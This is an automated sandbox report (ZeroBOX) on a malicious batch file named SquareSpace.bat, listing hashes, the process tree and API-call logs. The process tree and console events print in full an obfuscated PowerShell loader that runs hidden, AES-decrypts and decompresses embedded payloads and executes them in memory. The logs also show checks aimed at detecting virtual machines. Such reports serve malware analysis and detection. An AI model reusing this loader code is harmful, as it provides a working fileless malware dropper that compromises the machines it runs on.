Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Feb. 11, 2025, 10:41 a.m.	Feb. 11, 2025, 10:51 a.m.

Size	59.4KB
Type	DOS batch file, ASCII text, with very long lines, with CRLF line terminators
MD5	`dc38ed57b189d67b26b0dd7622067cf9`
SHA256	`13288324fe1b9f0f0220b49244d67e56b57569ba1cf84de8a94e20a78c7e0de7`
CRC32	`3B16643A`
ssdeep	`1536:F/1UragTjQ6eeAUCCie+5gEODZUK19SB8xu5:LabdU1ODROiE`
Yara	Antivirus - Contains references to security software

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "NTVqLNzJkq" C:\Users\test22\AppData\Local\Temp\SquareSpace.bat
2552
- cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\SquareSpace.bat
  2628
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SxdwVCPCgMSsIsCvtPeAC0Y12ZfQwy15kMKZCEJ6U1A='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1P9strNakfrnpmB7wPi6rQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VPckSkjWDpUVVwmMVWvXbNWwYjoPPMgErqUnOiRuRcwJLjhowmpdMCJiSGmJ=New-Object System.IO.MemoryStream(,$param_var); $VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug=New-Object System.IO.MemoryStream; $xOYQEPQWBJcKMniAnVnTdfuVUPmxBDwrkuZQDWTyMbkLIhSHpgHfqBcrucVO=New-Object System.IO.Compression.GZipStream($VPckSkjWDpUVVwmMVWvXbNWwYjoPPMgErqUnOiRuRcwJLjhowmpdMCJiSGmJ, [IO.Compression.CompressionMode]::Decompress); $xOYQEPQWBJcKMniAnVnTdfuVUPmxBDwrkuZQDWTyMbkLIhSHpgHfqBcrucVO.CopyTo($VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug); $xOYQEPQWBJcKMniAnVnTdfuVUPmxBDwrkuZQDWTyMbkLIhSHpgHfqBcrucVO.Dispose(); $VPckSkjWDpUVVwmMVWvXbNWwYjoPPMgErqUnOiRuRcwJLjhowmpdMCJiSGmJ.Dispose(); $VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug.Dispose(); $VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug.ToArray();}function execute_function($param_var,$param2_var){ $CsvXnLzsosWrcPhcVInNXFiuVqbJsHvAafVtGmyXHAsXkqdBuawMPiRXkabW=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $JQZGWvqWTNvIjqfwmlkFmApslJLRoYjFkBnQBMaOZgHGENCycuLYQwJiAHvm=$CsvXnLzsosWrcPhcVInNXFiuVqbJsHvAafVtGmyXHAsXkqdBuawMPiRXkabW.EntryPoint; $JQZGWvqWTNvIjqfwmlkFmApslJLRoYjFkBnQBMaOZgHGENCycuLYQwJiAHvm.Invoke($null, $param2_var);}$EExudKaOmVNfBRomsysLOBsLZJukJlGHlfFDRhWUsQXULBHRkAEiODfdmMvt = 'C:\Users\test22\AppData\Local\Temp\SquareSpace.bat';$host.UI.RawUI.WindowTitle = $EExudKaOmVNfBRomsysLOBsLZJukJlGHlfFDRhWUsQXULBHRkAEiODfdmMvt;$LDnZGGbUCOCSOxwdsnbKISRUSusOfyXBNqjFYMJgoDSSoyMLfhDZaXySLthl = [type]::GetType('System.IO.File');$nnPeQbfxnRfGEVwfaYFuIGIYVYBPSrTFExSaNOcnsoxobXveBsSMNNDHEQjS = [type]::GetType('System.Environment');$KyIUEPxIcoVAkvFgSJNxgmOTmkPORfqTqNeAxMcPqUwOylOvQDpRTXgxKPIt = $LDnZGGbUCOCSOxwdsnbKISRUSusOfyXBNqjFYMJgoDSSoyMLfhDZaXySLthl::('txeTllAdaeR'[-1..-11] -join '')($EExudKaOmVNfBRomsysLOBsLZJukJlGHlfFDRhWUsQXULBHRkAEiODfdmMvt);$aJQXYbjwqeIfHYhmQavbwuXoPzatHHQIeIPGeyPwbrfLVjkVQUHJtGWFLCiz = $nnPeQbfxnRfGEVwfaYFuIGIYVYBPSrTFExSaNOcnsoxobXveBsSMNNDHEQjS::NewLine;$bQOIoZbYjAhrlYZfolsFofCNahoyLjUBqqvlCwxVilMpMpyvGRqAjCkWnbIh = $KyIUEPxIcoVAkvFgSJNxgmOTmkPORfqTqNeAxMcPqUwOylOvQDpRTXgxKPIt.Split($aJQXYbjwqeIfHYhmQavbwuXoPzatHHQIeIPGeyPwbrfLVjkVQUHJtGWFLCiz);$qPeaogTvlKukBxtYDxZycDaiGySIaCrfMDEDLWGFHlFzfuGqkhzPMWqMPWtQ = $bQOIoZbYjAhrlYZfolsFofCNahoyLjUBqqvlCwxVilMpMpyvGRqAjCkWnbIh;foreach ($UJKbcwdbduZbtlriedZkEbJNcyWwRFJpqpWmXwsxOWoMANVHPQHJBvnSZXYD in $qPeaogTvlKukBxtYDxZycDaiGySIaCrfMDEDLWGFHlFzfuGqkhzPMWqMPWtQ) { if ($UJKbcwdbduZbtlriedZkEbJNcyWwRFJpqpWmXwsxOWoMANVHPQHJBvnSZXYD.StartsWith(':: ')) { $nluJtoyYTQmHRuQQXAcmRBxTdCtPnRNPDQrwQWgRVIxuUSYrgzPpTgYLNBFR=$UJKbcwdbduZbtlriedZkEbJNcyWwRFJpqpWmXwsxOWoMANVHPQHJBvnSZXYD.Substring(3); break; }}$payloads_var=[string[]]$nluJtoyYTQmHRuQQXAcmRBxTdCtPnRNPDQrwQWgRVIxuUSYrgzPpTgYLNBFR.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    2756

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW Feb. 11, 2025, 10:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 11, 2025, 10:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 11, 2025, 10:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 11, 2025, 10:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Feb. 11, 2025, 10:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 11, 2025, 10:41 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Feb. 11, 2025, 10:41 a.m.			0	0

Command line console output was observed (50 out of 55 events)

Time & API	Arguments	Status	Return
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: Unexpected token '(' in expression or statement. console_handle: 0x00000023	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: At line:1 char:295 console_handle: 0x0000002f	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: + function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography console_handle: 0x0000003b	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: .Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; console_handle: 0x00000047	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Ke console_handle: 0x00000053	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: y=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')( <<<< 'SxdwVCPCgMSsI console_handle: 0x0000005f	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: sCvtPeAC0Y12ZfQwy15kMKZCEJ6U1A='); $aes_var.IV=[System.Convert]::('gnirtS46esaB console_handle: 0x0000006b	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: morF'[-1..-16] -join '')('1P9strNakfrnpmB7wPi6rQ=='); $decryptor_var=$aes_var.C console_handle: 0x00000077	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: reateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, console_handle: 0x00000083	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var; console_handle: 0x0000008f	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: }function decompress_function($param_var){ $VPckSkjWDpUVVwmMVWvXbNWwYjoPPMgErqU console_handle: 0x0000009b	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: nOiRuRcwJLjhowmpdMCJiSGmJ=New-Object System.IO.MemoryStream(,$param_var); $VtgR console_handle: 0x000000a7	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: ipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug=New-Object System.IO.M console_handle: 0x000000b3	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: emoryStream; $xOYQEPQWBJcKMniAnVnTdfuVUPmxBDwrkuZQDWTyMbkLIhSHpgHfqBcrucVO=New- console_handle: 0x000000bf	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: Object System.IO.Compression.GZipStream($VPckSkjWDpUVVwmMVWvXbNWwYjoPPMgErqUnOi console_handle: 0x000000cb	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: RuRcwJLjhowmpdMCJiSGmJ, [IO.Compression.CompressionMode]::Decompress); $xOYQEPQ console_handle: 0x000000d7	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: WBJcKMniAnVnTdfuVUPmxBDwrkuZQDWTyMbkLIhSHpgHfqBcrucVO.CopyTo($VtgRipEFCZYMfagYq console_handle: 0x000000e3	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: nKOcasCwcRPGMuiWizxVFAwFCMxoCYMvLRFVyGVbDug); $xOYQEPQWBJcKMniAnVnTdfuVUPmxBDwr console_handle: 0x000000ef	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: kuZQDWTyMbkLIhSHpgHfqBcrucVO.Dispose(); $VPckSkjWDpUVVwmMVWvXbNWwYjoPPMgErqUnOi console_handle: 0x000000fb	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: RuRcwJLjhowmpdMCJiSGmJ.Dispose(); $VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMx console_handle: 0x00000107	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: oCYMvLRFVyGVbDug.Dispose(); $VtgRipEFCZYMfagYqnKOcasCwcRPGMuiWizxVFAwFCMxoCYMvL console_handle: 0x00000113	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: RFVyGVbDug.ToArray();}function execute_function($param_var,$param2_var){ $CsvXn console_handle: 0x0000011f	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: LzsosWrcPhcVInNXFiuVqbJsHvAafVtGmyXHAsXkqdBuawMPiRXkabW=[System.Reflection.Asse console_handle: 0x0000012b	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: mbly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $JQZGWvqWTNvIjqfwmlkFmAps console_handle: 0x00000137	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: lJLRoYjFkBnQBMaOZgHGENCycuLYQwJiAHvm=$CsvXnLzsosWrcPhcVInNXFiuVqbJsHvAafVtGmyXH console_handle: 0x00000143	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: AsXkqdBuawMPiRXkabW.EntryPoint; $JQZGWvqWTNvIjqfwmlkFmApslJLRoYjFkBnQBMaOZgHGEN console_handle: 0x0000014f	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: CycuLYQwJiAHvm.Invoke($null, $param2_var);}$EExudKaOmVNfBRomsysLOBsLZJukJlGHlfF console_handle: 0x0000015b	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: DRhWUsQXULBHRkAEiODfdmMvt = 'C:\Users\test22\AppData\Local\Temp\SquareSpace.bat console_handle: 0x00000167	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: ';$host.UI.RawUI.WindowTitle = $EExudKaOmVNfBRomsysLOBsLZJukJlGHlfFDRhWUsQXULBH console_handle: 0x00000173	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: RkAEiODfdmMvt;$LDnZGGbUCOCSOxwdsnbKISRUSusOfyXBNqjFYMJgoDSSoyMLfhDZaXySLthl = [ console_handle: 0x0000017f	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: type]::GetType('System.IO.File');$nnPeQbfxnRfGEVwfaYFuIGIYVYBPSrTFExSaNOcnsoxob console_handle: 0x0000018b	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: XveBsSMNNDHEQjS = [type]::GetType('System.Environment');$KyIUEPxIcoVAkvFgSJNxgm console_handle: 0x00000197	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: OTmkPORfqTqNeAxMcPqUwOylOvQDpRTXgxKPIt = $LDnZGGbUCOCSOxwdsnbKISRUSusOfyXBNqjFY console_handle: 0x000001a3	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: MJgoDSSoyMLfhDZaXySLthl::('txeTllAdaeR'[-1..-11] -join '')($EExudKaOmVNfBRomsys console_handle: 0x000001af	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: LOBsLZJukJlGHlfFDRhWUsQXULBHRkAEiODfdmMvt);$aJQXYbjwqeIfHYhmQavbwuXoPzatHHQIeIP console_handle: 0x000001bb	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: GeyPwbrfLVjkVQUHJtGWFLCiz = $nnPeQbfxnRfGEVwfaYFuIGIYVYBPSrTFExSaNOcnsoxobXveBs console_handle: 0x000001c7	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: SMNNDHEQjS::NewLine;$bQOIoZbYjAhrlYZfolsFofCNahoyLjUBqqvlCwxVilMpMpyvGRqAjCkWnb console_handle: 0x000001d3	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: Ih = $KyIUEPxIcoVAkvFgSJNxgmOTmkPORfqTqNeAxMcPqUwOylOvQDpRTXgxKPIt.Split($aJQXY console_handle: 0x000001df	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: bjwqeIfHYhmQavbwuXoPzatHHQIeIPGeyPwbrfLVjkVQUHJtGWFLCiz);$qPeaogTvlKukBxtYDxZyc console_handle: 0x000001eb	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: DaiGySIaCrfMDEDLWGFHlFzfuGqkhzPMWqMPWtQ = $bQOIoZbYjAhrlYZfolsFofCNahoyLjUBqqvl console_handle: 0x000001f7	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: CwxVilMpMpyvGRqAjCkWnbIh;foreach ($UJKbcwdbduZbtlriedZkEbJNcyWwRFJpqpWmXwsxOWoM console_handle: 0x00000203	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: ANVHPQHJBvnSZXYD in $qPeaogTvlKukBxtYDxZycDaiGySIaCrfMDEDLWGFHlFzfuGqkhzPMWqMPW console_handle: 0x0000020f	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: tQ) { if ($UJKbcwdbduZbtlriedZkEbJNcyWwRFJpqpWmXwsxOWoMANVHPQHJBvnSZXYD.StartsW console_handle: 0x0000021b	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: ith(':: ')) { $nluJtoyYTQmHRuQQXAcmRBxTdCtPnRNPDQrwQWgRVIxuUSYrgzPpTgYLNBFR=$UJ console_handle: 0x00000227	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: KbcwdbduZbtlriedZkEbJNcyWwRFJpqpWmXwsxOWoMANVHPQHJBvnSZXYD.Substring(3); break; console_handle: 0x00000233	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: }}$payloads_var=[string[]]$nluJtoyYTQmHRuQQXAcmRBxTdCtPnRNPDQrwQWgRVIxuUSYrgzP console_handle: 0x0000023f	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: pTgYLNBFR.Split('\');$payload1_var=decompress_function (decrypt_function ([Conv console_handle: 0x0000024b	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: ert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var= console_handle: 0x00000257	1	1
WriteConsoleW Feb. 11, 2025, 10:41 a.m.	buffer: decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] console_handle: 0x00000263	1	1

Uses Windows APIs to generate a cryptographic key (44 events)

Time & API	Arguments	Status	Return
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544578 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544af8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544af8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544af8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544678 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544678 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544678 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544678 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544678 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544678 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544138 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544138 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544138 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544af8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544af8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544af8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005449f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544af8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544af8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544af8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544af8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544af8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544af8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544af8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544278 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544278 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544278 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544278 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544278 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544278 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544278 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544278 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544278 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544278 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544278 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544278 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544278 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544278 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 11, 2025, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00544ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Feb. 11, 2025, 10:41 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 140 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 1900544 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b80000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02d10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02d11000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02d12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 11, 2025, 10:41 a.m.	process_identifier: 2756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0215a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
